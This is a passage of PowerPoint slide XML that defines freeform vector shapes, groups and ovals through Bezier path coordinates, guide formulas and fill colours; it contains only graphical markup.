                    <a:gd name="T13" fmla="*/ 36 h 245"/>
                    <a:gd name="T14" fmla="*/ 2 w 90"/>
                    <a:gd name="T15" fmla="*/ 205 h 245"/>
                    <a:gd name="T16" fmla="*/ 43 w 90"/>
                    <a:gd name="T17" fmla="*/ 205 h 245"/>
                    <a:gd name="T18" fmla="*/ 45 w 90"/>
                    <a:gd name="T19" fmla="*/ 51 h 245"/>
                    <a:gd name="T20" fmla="*/ 36 w 90"/>
                    <a:gd name="T21" fmla="*/ 40 h 245"/>
                    <a:gd name="T22" fmla="*/ 45 w 90"/>
                    <a:gd name="T23" fmla="*/ 51 h 245"/>
                    <a:gd name="T24" fmla="*/ 43 w 90"/>
                    <a:gd name="T25" fmla="*/ 205 h 245"/>
                    <a:gd name="T26" fmla="*/ 44 w 90"/>
                    <a:gd name="T27" fmla="*/ 211 h 245"/>
                    <a:gd name="T28" fmla="*/ 88 w 90"/>
                    <a:gd name="T29" fmla="*/ 218 h 245"/>
                    <a:gd name="T30" fmla="*/ 89 w 90"/>
                    <a:gd name="T31" fmla="*/ 15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" h="245">
                      <a:moveTo>
                        <a:pt x="89" y="156"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="89" y="141"/>
                        <a:pt x="90" y="47"/>
                        <a:pt x="89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  <a:cubicBezTo>
                        <a:pt x="55" y="20"/>
                        <a:pt x="24" y="13"/>
                        <a:pt x="12" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="10"/>
                        <a:pt x="4" y="5"/>
                        <a:pt x="2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5"/>
                        <a:pt x="43" y="205"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="171"/>
                        <a:pt x="46" y="55"/>
                        <a:pt x="45" y="51"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="45" y="47"/>
                        <a:pt x="36" y="47"/>
                        <a:pt x="36" y="40"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="36" y="47"/>
                        <a:pt x="45" y="47"/>
                        <a:pt x="45" y="51"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="46" y="55"/>
                        <a:pt x="43" y="171"/>
                        <a:pt x="43" y="205"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="207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12" name="Freeform 1021">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D976AF85-DAE4-4A85-AED4-4333A81FAE5B}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1155" y="1118"/>
                  <a:ext cx="313" cy="258"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 235 w 236"/>
                    <a:gd name="T1" fmla="*/ 114 h 194"/>
                    <a:gd name="T2" fmla="*/ 235 w 236"/>
                    <a:gd name="T3" fmla="*/ 114 h 194"/>
                    <a:gd name="T4" fmla="*/ 225 w 236"/>
                    <a:gd name="T5" fmla="*/ 49 h 194"/>
                    <a:gd name="T6" fmla="*/ 199 w 236"/>
                    <a:gd name="T7" fmla="*/ 24 h 194"/>
                    <a:gd name="T8" fmla="*/ 156 w 236"/>
                    <a:gd name="T9" fmla="*/ 13 h 194"/>
                    <a:gd name="T10" fmla="*/ 116 w 236"/>
                    <a:gd name="T11" fmla="*/ 2 h 194"/>
                    <a:gd name="T12" fmla="*/ 86 w 236"/>
                    <a:gd name="T13" fmla="*/ 12 h 194"/>
                    <a:gd name="T14" fmla="*/ 73 w 236"/>
                    <a:gd name="T15" fmla="*/ 86 h 194"/>
                    <a:gd name="T16" fmla="*/ 73 w 236"/>
                    <a:gd name="T17" fmla="*/ 86 h 194"/>
                    <a:gd name="T18" fmla="*/ 72 w 236"/>
                    <a:gd name="T19" fmla="*/ 91 h 194"/>
                    <a:gd name="T20" fmla="*/ 21 w 236"/>
                    <a:gd name="T21" fmla="*/ 104 h 194"/>
                    <a:gd name="T22" fmla="*/ 26 w 236"/>
                    <a:gd name="T23" fmla="*/ 135 h 194"/>
                    <a:gd name="T24" fmla="*/ 80 w 236"/>
                    <a:gd name="T25" fmla="*/ 122 h 194"/>
                    <a:gd name="T26" fmla="*/ 80 w 236"/>
                    <a:gd name="T27" fmla="*/ 122 h 194"/>
                    <a:gd name="T28" fmla="*/ 86 w 236"/>
                    <a:gd name="T29" fmla="*/ 120 h 194"/>
                    <a:gd name="T30" fmla="*/ 99 w 236"/>
                    <a:gd name="T31" fmla="*/ 112 h 194"/>
                    <a:gd name="T32" fmla="*/ 104 w 236"/>
                    <a:gd name="T33" fmla="*/ 92 h 194"/>
                    <a:gd name="T34" fmla="*/ 104 w 236"/>
                    <a:gd name="T35" fmla="*/ 92 h 194"/>
                    <a:gd name="T36" fmla="*/ 110 w 236"/>
                    <a:gd name="T37" fmla="*/ 47 h 194"/>
                    <a:gd name="T38" fmla="*/ 109 w 236"/>
                    <a:gd name="T39" fmla="*/ 167 h 194"/>
                    <a:gd name="T40" fmla="*/ 118 w 236"/>
                    <a:gd name="T41" fmla="*/ 178 h 194"/>
                    <a:gd name="T42" fmla="*/ 169 w 236"/>
                    <a:gd name="T43" fmla="*/ 192 h 194"/>
                    <a:gd name="T44" fmla="*/ 196 w 236"/>
                    <a:gd name="T45" fmla="*/ 173 h 194"/>
                    <a:gd name="T46" fmla="*/ 196 w 236"/>
                    <a:gd name="T47" fmla="*/ 160 h 194"/>
                    <a:gd name="T48" fmla="*/ 216 w 236"/>
                    <a:gd name="T49" fmla="*/ 155 h 194"/>
                    <a:gd name="T50" fmla="*/ 219 w 236"/>
                    <a:gd name="T51" fmla="*/ 154 h 194"/>
                    <a:gd name="T52" fmla="*/ 232 w 236"/>
                    <a:gd name="T53" fmla="*/ 146 h 194"/>
                    <a:gd name="T54" fmla="*/ 236 w 236"/>
                    <a:gd name="T55" fmla="*/ 124 h 194"/>
                    <a:gd name="T56" fmla="*/ 235 w 236"/>
                    <a:gd name="T57" fmla="*/ 114 h 194"/>
                    <a:gd name="T58" fmla="*/ 192 w 236"/>
                    <a:gd name="T59" fmla="*/ 75 h 194"/>
                    <a:gd name="T60" fmla="*/ 194 w 236"/>
                    <a:gd name="T61" fmla="*/ 88 h 194"/>
                    <a:gd name="T62" fmla="*/ 200 w 236"/>
                    <a:gd name="T63" fmla="*/ 123 h 194"/>
                    <a:gd name="T64" fmla="*/ 196 w 236"/>
                    <a:gd name="T65" fmla="*/ 124 h 194"/>
                    <a:gd name="T66" fmla="*/ 194 w 236"/>
                    <a:gd name="T67" fmla="*/ 88 h 194"/>
                    <a:gd name="T68" fmla="*/ 192 w 236"/>
                    <a:gd name="T69" fmla="*/ 75 h 194"/>
                    <a:gd name="T70" fmla="*/ 192 w 236"/>
                    <a:gd name="T71" fmla="*/ 71 h 194"/>
                    <a:gd name="T72" fmla="*/ 192 w 236"/>
                    <a:gd name="T73" fmla="*/ 75 h 1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6" h="194">
                      <a:moveTo>
                        <a:pt x="235" y="114"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="235" y="114"/>
                        <a:pt x="235" y="114"/>
                        <a:pt x="235" y="114"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="230" y="85"/>
                        <a:pt x="226" y="57"/>
                        <a:pt x="225" y="49"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="222" y="32"/>
                        <a:pt x="207" y="27"/>
                        <a:pt x="199" y="24"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="191" y="21"/>
                        <a:pt x="169" y="16"/>
                        <a:pt x="156" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="144" y="9"/>
                        <a:pt x="125" y="3"/>
                        <a:pt x="116" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="107" y="0"/>
                        <a:pt x="89" y="4"/>
                        <a:pt x="86" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="85" y="14"/>
                        <a:pt x="79" y="50"/>
                        <a:pt x="73" y="86"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="73" y="86"/>
                        <a:pt x="73" y="86"/>
                        <a:pt x="73" y="86"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="72" y="91"/>
                        <a:pt x="72" y="91"/>
                        <a:pt x="72" y="91"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="49" y="96"/>
                        <a:pt x="28" y="103"/>
                        <a:pt x="21" y="104"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="109"/>
                        <a:pt x="9" y="137"/>
                        <a:pt x="26" y="135"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="31" y="135"/>
                        <a:pt x="55" y="129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6" y="120"/>
                        <a:pt x="86" y="120"/>
                        <a:pt x="86" y="120"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="92" y="118"/>
                        <a:pt x="96" y="116"/>
                        <a:pt x="99" y="112"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="102" y="108"/>
                        <a:pt x="104" y="102"/>
                        <a:pt x="104" y="92"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="104" y="92"/>
                        <a:pt x="104" y="92"/>
                        <a:pt x="104" y="92"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="107" y="65"/>
                        <a:pt x="110" y="43"/>
                        <a:pt x="110" y="47"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="110" y="53"/>
                        <a:pt x="109" y="125"/>
                        <a:pt x="109" y="167"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="110" y="172"/>
                        <a:pt x="112" y="177"/>
                        <a:pt x="118" y="178"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="130" y="180"/>
                        <a:pt x="162" y="190"/>
                        <a:pt x="169" y="192"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="177" y="194"/>
                        <a:pt x="193" y="184"/>
                        <a:pt x="196" y="173"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="196" y="171"/>
                        <a:pt x="196" y="162"/>
                        <a:pt x="196" y="160"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="202" y="158"/>
                        <a:pt x="208" y="157"/>
                        <a:pt x="216" y="155"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="217" y="155"/>
                        <a:pt x="218" y="154"/>
                        <a:pt x="219" y="154"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="225" y="152"/>
                        <a:pt x="229" y="150"/>
                        <a:pt x="232" y="146"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="235" y="142"/>
                        <a:pt x="236" y="135"/>
                        <a:pt x="236" y="124"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="235" y="114"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="192" y="75"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="193" y="79"/>
                        <a:pt x="194" y="83"/>
                        <a:pt x="194" y="88"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="195" y="97"/>
                        <a:pt x="197" y="108"/>
                        <a:pt x="200" y="123"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="198" y="123"/>
                        <a:pt x="197" y="124"/>
                        <a:pt x="196" y="124"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="196" y="111"/>
                        <a:pt x="195" y="99"/>
                        <a:pt x="194" y="88"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="193" y="82"/>
                        <a:pt x="193" y="78"/>
                        <a:pt x="192" y="75"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="192" y="73"/>
                        <a:pt x="192" y="72"/>
                        <a:pt x="192" y="71"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="192" y="72"/>
                        <a:pt x="192" y="73"/>
                        <a:pt x="192" y="7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13" name="Freeform 1022">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFE198B5-0CF8-427A-ACF0-EE18FE592CB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312" y="1102"/>
                  <a:ext cx="87" cy="55"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 29 w 66"/>
                    <a:gd name="T1" fmla="*/ 39 h 41"/>
                    <a:gd name="T2" fmla="*/ 10 w 66"/>
                    <a:gd name="T3" fmla="*/ 23 h 41"/>
                    <a:gd name="T4" fmla="*/ 15 w 66"/>
                    <a:gd name="T5" fmla="*/ 13 h 41"/>
                    <a:gd name="T6" fmla="*/ 53 w 66"/>
                    <a:gd name="T7" fmla="*/ 16 h 41"/>
                    <a:gd name="T8" fmla="*/ 57 w 66"/>
                    <a:gd name="T9" fmla="*/ 29 h 41"/>
                    <a:gd name="T10" fmla="*/ 29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29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6" y="21"/>
                        <a:pt x="13" y="16"/>
                        <a:pt x="15" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="10"/>
                        <a:pt x="53" y="0"/>
                        <a:pt x="53" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="53" y="21"/>
                        <a:pt x="47" y="25"/>
                        <a:pt x="57" y="29"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="66" y="33"/>
                        <a:pt x="46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14" name="Freeform 1023">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56D760A8-BCCD-44FA-907D-30D164A4EDE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321" y="1281"/>
                  <a:ext cx="121" cy="72"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 75 w 91"/>
                    <a:gd name="T1" fmla="*/ 0 h 54"/>
                    <a:gd name="T2" fmla="*/ 27 w 91"/>
                    <a:gd name="T3" fmla="*/ 14 h 54"/>
                    <a:gd name="T4" fmla="*/ 40 w 91"/>
                    <a:gd name="T5" fmla="*/ 46 h 54"/>
                    <a:gd name="T6" fmla="*/ 91 w 91"/>
                    <a:gd name="T7" fmla="*/ 32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1" h="54">
                      <a:moveTo>
                        <a:pt x="75" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="61" y="4"/>
                        <a:pt x="45" y="9"/>
                        <a:pt x="27" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="22"/>
                        <a:pt x="17" y="54"/>
                        <a:pt x="40" y="46"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="44"/>
                        <a:pt x="65" y="38"/>
                        <a:pt x="91" y="32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15" name="Oval 1024">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0051A63-C145-4639-870E-CF1AD85123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flipH="1">
                  <a:off x="1302" y="1032"/>
                  <a:ext cx="105" cy="105"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1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84" name="Group 1025">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3105244F-D407-4DEF-A7AD-DDFE61006898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flipH="1">
                <a:off x="1221" y="2150"/>
                <a:ext cx="429" cy="228"/>
                <a:chOff x="786" y="2382"/>
                <a:chExt cx="1190" cy="634"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="1899" name="Freeform 1026">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B6C9063-104F-496E-9E0A-4E9AD493031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933" y="2464"/>
                  <a:ext cx="43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00" name="Freeform 1027">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D44D690-7B81-4E53-9744-DB75CBA3B35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888" y="2464"/>
                  <a:ext cx="45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01" name="Freeform 1028">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC74B3B4-1E9D-4B76-9B44-F51FA3693B9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038" y="2694"/>
                  <a:ext cx="46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4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02" name="Freeform 1029">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CE87AC0-31B8-4331-BAF0-2EC3A3E78C8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084" y="2694"/>
                  <a:ext cx="42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03" name="Freeform 1030">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{485E1A5F-F2EF-4295-8BAD-322DD5E9BCE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786" y="2625"/>
                  <a:ext cx="45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04" name="Freeform 1031">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6D612B0-6EF3-4380-88A6-525CF703D6C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831" y="2625"/>
                  <a:ext cx="43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05" name="Freeform 1032">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43A9045F-204B-4DE6-A2FA-103F2392E8A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633" y="2382"/>
                  <a:ext cx="42" cy="325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06" name="Freeform 1033">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2E2478C-3BF9-4FBD-A267-81FE2378128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633" y="2394"/>
                  <a:ext cx="42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4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07" name="Freeform 1034">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31D9C881-77A1-41C5-8836-8D788006DC5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675" y="2394"/>
                  <a:ext cx="46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08" name="Freeform 1035">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{451D18AA-1114-4955-97E6-9196B8458F9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786" y="2382"/>
                  <a:ext cx="1190" cy="325"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 321"/>
                    <a:gd name="T1" fmla="*/ 65 h 87"/>
                    <a:gd name="T2" fmla="*/ 160 w 321"/>
                    <a:gd name="T3" fmla="*/ 22 h 87"/>
                    <a:gd name="T4" fmla="*/ 160 w 321"/>
                    <a:gd name="T5" fmla="*/ 22 h 87"/>
                    <a:gd name="T6" fmla="*/ 240 w 321"/>
                    <a:gd name="T7" fmla="*/ 0 h 87"/>
                    <a:gd name="T8" fmla="*/ 321 w 321"/>
                    <a:gd name="T9" fmla="*/ 22 h 87"/>
                    <a:gd name="T10" fmla="*/ 240 w 321"/>
                    <a:gd name="T11" fmla="*/ 44 h 87"/>
                    <a:gd name="T12" fmla="*/ 240 w 321"/>
                    <a:gd name="T13" fmla="*/ 44 h 87"/>
                    <a:gd name="T14" fmla="*/ 81 w 321"/>
                    <a:gd name="T15" fmla="*/ 87 h 87"/>
                    <a:gd name="T16" fmla="*/ 0 w 321"/>
                    <a:gd name="T17" fmla="*/ 6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21" h="87">
                      <a:moveTo>
                        <a:pt x="0" y="65"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="160" y="22"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="160" y="22"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="240" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="321" y="22"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="240" y="44"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="240" y="44"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="81" y="87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8E47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09" name="Freeform 1036">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6835F9CC-C8FF-484B-88B1-1B9F8563B00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084" y="2464"/>
                  <a:ext cx="892" cy="285"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 241"/>
                    <a:gd name="T1" fmla="*/ 65 h 77"/>
                    <a:gd name="T2" fmla="*/ 0 w 241"/>
                    <a:gd name="T3" fmla="*/ 77 h 77"/>
                    <a:gd name="T4" fmla="*/ 241 w 241"/>
                    <a:gd name="T5" fmla="*/ 12 h 77"/>
                    <a:gd name="T6" fmla="*/ 241 w 241"/>
                    <a:gd name="T7" fmla="*/ 0 h 77"/>
                    <a:gd name="T8" fmla="*/ 0 w 241"/>
                    <a:gd name="T9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1" h="77">
                      <a:moveTo>
                        <a:pt x="0" y="65"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="77"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="241" y="12"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="241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10" name="Freeform 1037">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94734975-A970-4841-82F3-19431898BE4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786" y="2625"/>
                  <a:ext cx="298" cy="124"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 80"/>
                    <a:gd name="T1" fmla="*/ 0 h 34"/>
                    <a:gd name="T2" fmla="*/ 0 w 80"/>
                    <a:gd name="T3" fmla="*/ 13 h 34"/>
                    <a:gd name="T4" fmla="*/ 80 w 80"/>
                    <a:gd name="T5" fmla="*/ 34 h 34"/>
                    <a:gd name="T6" fmla="*/ 80 w 80"/>
                    <a:gd name="T7" fmla="*/ 22 h 34"/>
                    <a:gd name="T8" fmla="*/ 0 w 80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0" h="34">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="13"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="80" y="34"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="80" y="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85" name="Group 1038">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A84D968E-4771-418C-9C24-0A9BF967B82D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1340" y="2117"/>
                <a:ext cx="191" cy="108"/>
                <a:chOff x="347" y="3532"/>
                <a:chExt cx="907" cy="516"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="1891" name="Freeform 1039">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7EE2F64-451F-457D-801A-1E87E77A9CA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800" y="3573"/>
                  <a:ext cx="303" cy="394"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 303"/>
                    <a:gd name="T1" fmla="*/ 0 h 394"/>
                    <a:gd name="T2" fmla="*/ 0 w 303"/>
                    <a:gd name="T3" fmla="*/ 312 h 394"/>
                    <a:gd name="T4" fmla="*/ 303 w 303"/>
                    <a:gd name="T5" fmla="*/ 394 h 394"/>
                    <a:gd name="T6" fmla="*/ 303 w 303"/>
                    <a:gd name="T7" fmla="*/ 82 h 394"/>
                    <a:gd name="T8" fmla="*/ 0 w 303"/>
                    <a:gd name="T9" fmla="*/ 0 h 3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3" h="394">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="312"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="303" y="394"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="303" y="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993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92" name="Freeform 1040">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{882AFBEE-3564-4793-BEB7-C77C9107C0E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800" y="3655"/>
                  <a:ext cx="303" cy="393"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 303"/>
                    <a:gd name="T1" fmla="*/ 393 h 393"/>
                    <a:gd name="T2" fmla="*/ 0 w 303"/>
                    <a:gd name="T3" fmla="*/ 81 h 393"/>
                    <a:gd name="T4" fmla="*/ 303 w 303"/>
                    <a:gd name="T5" fmla="*/ 0 h 393"/>
                    <a:gd name="T6" fmla="*/ 303 w 303"/>
                    <a:gd name="T7" fmla="*/ 312 h 393"/>
                    <a:gd name="T8" fmla="*/ 0 w 303"/>
                    <a:gd name="T9" fmla="*/ 393 h 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3" h="393">
                      <a:moveTo>
                        <a:pt x="0" y="393"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="81"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="303" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="303" y="312"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="393"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="FF993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93" name="Freeform 1041">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD1B8C43-610A-4FE4-8066-3AC35F24877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501" y="3573"/>
                  <a:ext cx="299" cy="394"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 299"/>
                    <a:gd name="T1" fmla="*/ 394 h 394"/>
                    <a:gd name="T2" fmla="*/ 0 w 299"/>
                    <a:gd name="T3" fmla="*/ 82 h 394"/>
                    <a:gd name="T4" fmla="*/ 299 w 299"/>
                    <a:gd name="T5" fmla="*/ 0 h 394"/>
                    <a:gd name="T6" fmla="*/ 299 w 299"/>
                    <a:gd name="T7" fmla="*/ 312 h 394"/>
                    <a:gd name="T8" fmla="*/ 0 w 299"/>
                    <a:gd name="T9" fmla="*/ 394 h 3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9" h="394">
                      <a:moveTo>
                        <a:pt x="0" y="394"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="82"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="299" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="299" y="312"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="394"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="FF993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94" name="Freeform 1042">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4FBD4D5-367C-4C3B-BA9C-7247EB14EB5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501" y="3655"/>
                  <a:ext cx="299" cy="393"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 299"/>
                    <a:gd name="T1" fmla="*/ 0 h 393"/>
                    <a:gd name="T2" fmla="*/ 0 w 299"/>
                    <a:gd name="T3" fmla="*/ 312 h 393"/>
